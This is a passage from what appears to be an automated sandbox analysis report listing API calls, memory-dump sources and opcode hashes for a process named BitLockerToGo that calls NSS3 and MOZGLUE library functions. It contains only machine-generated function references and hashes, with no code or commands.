                                                                                                                                                      • memcpy.VCRUNTIME140(8B3C75C0,?,6C987FFA), ref: 6C9B2EA4
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9B317B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Error$memcpy$K11_Value
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2334702667-0
                                                                                                                                                      • Opcode ID: c12935bd56b0d1f9145a298826d3c9d22ae93ca363f0edba0c28a16d8bc8da1b
                                                                                                                                                      • Instruction ID: 0fea932e75736b302cfa87e38c938bbb501bb9b7ad66b2444bd303834f47e4f9
                                                                                                                                                      • Opcode Fuzzy Hash: c12935bd56b0d1f9145a298826d3c9d22ae93ca363f0edba0c28a16d8bc8da1b
                                                                                                                                                      • Instruction Fuzzy Hash: 17A19A71A00218AFDB24CF54CC84BEBB7B9EF49308F148199E9496B741E731AE95CF91
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C97ED6B
                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6C97EDCE
                                                                                                                                                        • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                        • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,6C97B04F), ref: 6C97EE46
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C97EECA
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C97EEEA
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C97EEFB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3768380896-0
                                                                                                                                                      • Opcode ID: 00b77bfc1901e4b4fa96f4c777dac59e6442ddae21a7aaf0ee2860eaffe37229
                                                                                                                                                      • Instruction ID: 436103aa3ff07843aadff0a5395223bbf12119a3a938bf5c4ea4940e6a5b6c8a
                                                                                                                                                      • Opcode Fuzzy Hash: 00b77bfc1901e4b4fa96f4c777dac59e6442ddae21a7aaf0ee2860eaffe37229
                                                                                                                                                      • Instruction Fuzzy Hash: D9815CB5A02205DFEB24CF55D984AAB77F9BF89308F144428E8159BB51E730E815CBB1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e1cbde3f9955cb05b064817fab9232b45411fc927faaa7f29b102fdaeca37334
                                                                                                                                                      • Instruction ID: dd07d9f8206687100783fb9317bb7a1bc7cadbd518ce121211e0050354b5e31e
                                                                                                                                                      • Opcode Fuzzy Hash: e1cbde3f9955cb05b064817fab9232b45411fc927faaa7f29b102fdaeca37334
                                                                                                                                                      • Instruction Fuzzy Hash: D8A15870A007558FDB24CF29CA94A9DFBF1BF49304F448A6ED44A97B01E730A985CFA0
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8514C5
                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8514E2
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C851546
                                                                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C8515BA
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8516B4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1909280232-0
                                                                                                                                                      • Opcode ID: 01d329519d87ce10f1aed1e1e9642fdaf6bc69f14b1710f28c81561be63d55a7
                                                                                                                                                      • Instruction ID: 43418f00c4ae72a2a25a39fd50fcc2839f35beaf23b6862662fc6d8409dec652
                                                                                                                                                      • Opcode Fuzzy Hash: 01d329519d87ce10f1aed1e1e9642fdaf6bc69f14b1710f28c81561be63d55a7
                                                                                                                                                      • Instruction Fuzzy Hash: 6761E171A007149BDB218F25C980BDEB7B1BF89308F44892CED8A57701EB70E958CB91
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C97C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C97DAE2,?), ref: 6C97C6C2
                                                                                                                                                      • PR_Now.NSS3 ref: 6C97CD35
                                                                                                                                                        • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                        • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                        • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                        • Part of subcall function 6C966C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C3F
                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C97CD54
                                                                                                                                                        • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                        • Part of subcall function 6C967260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911CCC,00000000,00000000,?,?), ref: 6C96729F
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C97CD9B
                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C97CE0B
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C97CE2C
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                        • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                        • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C97CE40
                                                                                                                                                        • Part of subcall function 6C9714C0: TlsGetValue.KERNEL32 ref: 6C9714E0
                                                                                                                                                        • Part of subcall function 6C9714C0: EnterCriticalSection.KERNEL32 ref: 6C9714F5
                                                                                                                                                        • Part of subcall function 6C9714C0: PR_Unlock.NSS3 ref: 6C97150D
                                                                                                                                                        • Part of subcall function 6C97CEE0: PORT_ArenaMark_Util.NSS3(?,6C97CD93,?), ref: 6C97CEEE
                                                                                                                                                        • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C97CD93,?), ref: 6C97CEFC
                                                                                                                                                        • Part of subcall function 6C97CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C97CD93,?), ref: 6C97CF0B
                                                                                                                                                        • Part of subcall function 6C97CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C97CD93,?), ref: 6C97CF1D
                                                                                                                                                        • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF47
                                                                                                                                                        • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF67
                                                                                                                                                        • Part of subcall function 6C97CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C97CD93,?,?,?,?,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF78
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3748922049-0
                                                                                                                                                      • Opcode ID: 36de9fd9717234d52a7e37d845652f3034869c33d9cb22aad22095469079baf9
                                                                                                                                                      • Instruction ID: f53f41f9225cce7b7d1cb5ba0927d319323d429ed250efca895667d2f494b280
                                                                                                                                                      • Opcode Fuzzy Hash: 36de9fd9717234d52a7e37d845652f3034869c33d9cb22aad22095469079baf9
                                                                                                                                                      • Instruction Fuzzy Hash: 7D51B576A025019BE730EF69DC40BAA73F8AF68348F250524D959A7B40EB31ED05CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C94EF38
                                                                                                                                                        • Part of subcall function 6C939520: PK11_IsLoggedIn.NSS3(00000000,?,6C96379E,?,00000001,?), ref: 6C939542
                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C94EF53
                                                                                                                                                        • Part of subcall function 6C954C20: TlsGetValue.KERNEL32 ref: 6C954C4C
                                                                                                                                                        • Part of subcall function 6C954C20: EnterCriticalSection.KERNEL32(?), ref: 6C954C60
                                                                                                                                                        • Part of subcall function 6C954C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954CA1
                                                                                                                                                        • Part of subcall function 6C954C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C954CBE
                                                                                                                                                        • Part of subcall function 6C954C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954CD2
                                                                                                                                                        • Part of subcall function 6C954C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954D3A
                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C94EF9E
                                                                                                                                                        • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C94EFC3
                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C94F016
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C94F022
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2459274275-0
                                                                                                                                                      • Opcode ID: c14db17c7fa7db8fe0c5d8510ec3e74b43aef5ec75383330fe4a9213fc8c1961
                                                                                                                                                      • Instruction ID: 1e06af7fd9397295eca2143685b8eec0b50c975d71ff1023846b8993872a92b8
                                                                                                                                                      • Opcode Fuzzy Hash: c14db17c7fa7db8fe0c5d8510ec3e74b43aef5ec75383330fe4a9213fc8c1961
                                                                                                                                                      • Instruction Fuzzy Hash: F6418371E0020AAFDF01CFA9DC45BEE7BB9AF58358F058025F914A7350E771D9158BA1
                                                                                                                                                      APIs
                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C912D1A), ref: 6C922E7E
                                                                                                                                                        • Part of subcall function 6C9707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C918298,?,?,?,6C90FCE5,?), ref: 6C9707BF
                                                                                                                                                        • Part of subcall function 6C9707B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9707E6
                                                                                                                                                        • Part of subcall function 6C9707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C97081B
                                                                                                                                                        • Part of subcall function 6C9707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C970825
                                                                                                                                                      • PR_Now.NSS3 ref: 6C922EDF
                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C922EE9
                                                                                                                                                      • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C912D1A), ref: 6C922F01
                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C912D1A), ref: 6C922F50
                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C922F81
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 287051776-0
                                                                                                                                                      • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                      • Instruction ID: 917ca9b44a5fdac855102d7f935076628dcbcb1558a1e59fec10964c168c1cfe
                                                                                                                                                      • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                      • Instruction Fuzzy Hash: AB31457153190087F720C625CC48BFE7269EF90338F640579D5AA97AD8EB39D86AC621
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C84DC60
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C84D38A,?), ref: 6C84DC6F
                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,6C84D38A,?), ref: 6C84DCC1
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C84D38A,?), ref: 6C84DCE9
                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C84D38A,?), ref: 6C84DD05
                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C84D38A,?), ref: 6C84DD4A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1842996449-0
                                                                                                                                                      • Opcode ID: 126e2cadca02a5c5b8eafdf04010740ed07c521f826ccfc4fdae5c8e51cef56e
                                                                                                                                                      • Instruction ID: b920b97221829eff998bad37695137e488407c33144dc1629c2b5dbc5231c37a
                                                                                                                                                      • Opcode Fuzzy Hash: 126e2cadca02a5c5b8eafdf04010740ed07c521f826ccfc4fdae5c8e51cef56e
                                                                                                                                                      • Instruction Fuzzy Hash: 71416DB5A00619CFCB20CF99C98499EB7F6FF89318B55896AD945A7B11D731FC00CB90
                                                                                                                                                      APIs
                                                                                                                                                      • CERT_DecodeAVAValue.NSS3(?,?,6C910A2C), ref: 6C910E0F
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C910A2C), ref: 6C910E73
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C910A2C), ref: 6C910E85
                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C910A2C), ref: 6C910E90
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C910EC4
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C910A2C), ref: 6C910ED9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3618544408-0
                                                                                                                                                      • Opcode ID: da0b7cf40456a2fb795f7858b88396fd7e490b70f7bc2f2df860ad46f2f25d0b
                                                                                                                                                      • Instruction ID: 0d11107474fdc155b9bbe1c61715ac27b2aceedfc797d71549401165d3731515
                                                                                                                                                      • Opcode Fuzzy Hash: da0b7cf40456a2fb795f7858b88396fd7e490b70f7bc2f2df860ad46f2f25d0b
                                                                                                                                                      • Instruction Fuzzy Hash: 20216E72F0828C47EB1049679C47B6B76AEDBD170CF091035D81C93E02EA62C87483A1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C82FA80: GetCurrentThreadId.KERNEL32 ref: 6C82FA8D
                                                                                                                                                        • Part of subcall function 6C82FA80: AcquireSRWLockExclusive.KERNEL32(6C87F448), ref: 6C82FA99
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C836727
                                                                                                                                                      • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C8367C8
                                                                                                                                                        • Part of subcall function 6C844290: memcpy.VCRUNTIME140(?,?,6C852003,6C850AD9,?,6C850AD9,00000000,?,6C850AD9,?,00000004,?,6C851A62,?,6C852003,?), ref: 6C8442C4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                      • String ID: data
                                                                                                                                                      • API String ID: 511789754-2918445923
                                                                                                                                                      • Opcode ID: 59560f65df842734ce56148546927d12fa15bc0c73d70ce8e55f3a6d0b25dc9e
                                                                                                                                                      • Instruction ID: 5a012ccfad9b9f76f2b16699b02b75ec54e98491dd9120ca0e466088d2054585
                                                                                                                                                      • Opcode Fuzzy Hash: 59560f65df842734ce56148546927d12fa15bc0c73d70ce8e55f3a6d0b25dc9e
                                                                                                                                                      • Instruction Fuzzy Hash: 21D1BE75A083508BD730CF69CA44B9EB7E1BFC5308F509D2ED48987B51EB30A849CB92
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C91AEB3
                                                                                                                                                      • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C91AECA
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C91AEDD
                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C91AF02
                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CA39500), ref: 6C91AF23
                                                                                                                                                        • Part of subcall function 6C96F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C96F0C8
                                                                                                                                                        • Part of subcall function 6C96F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C96F122
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C91AF37
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
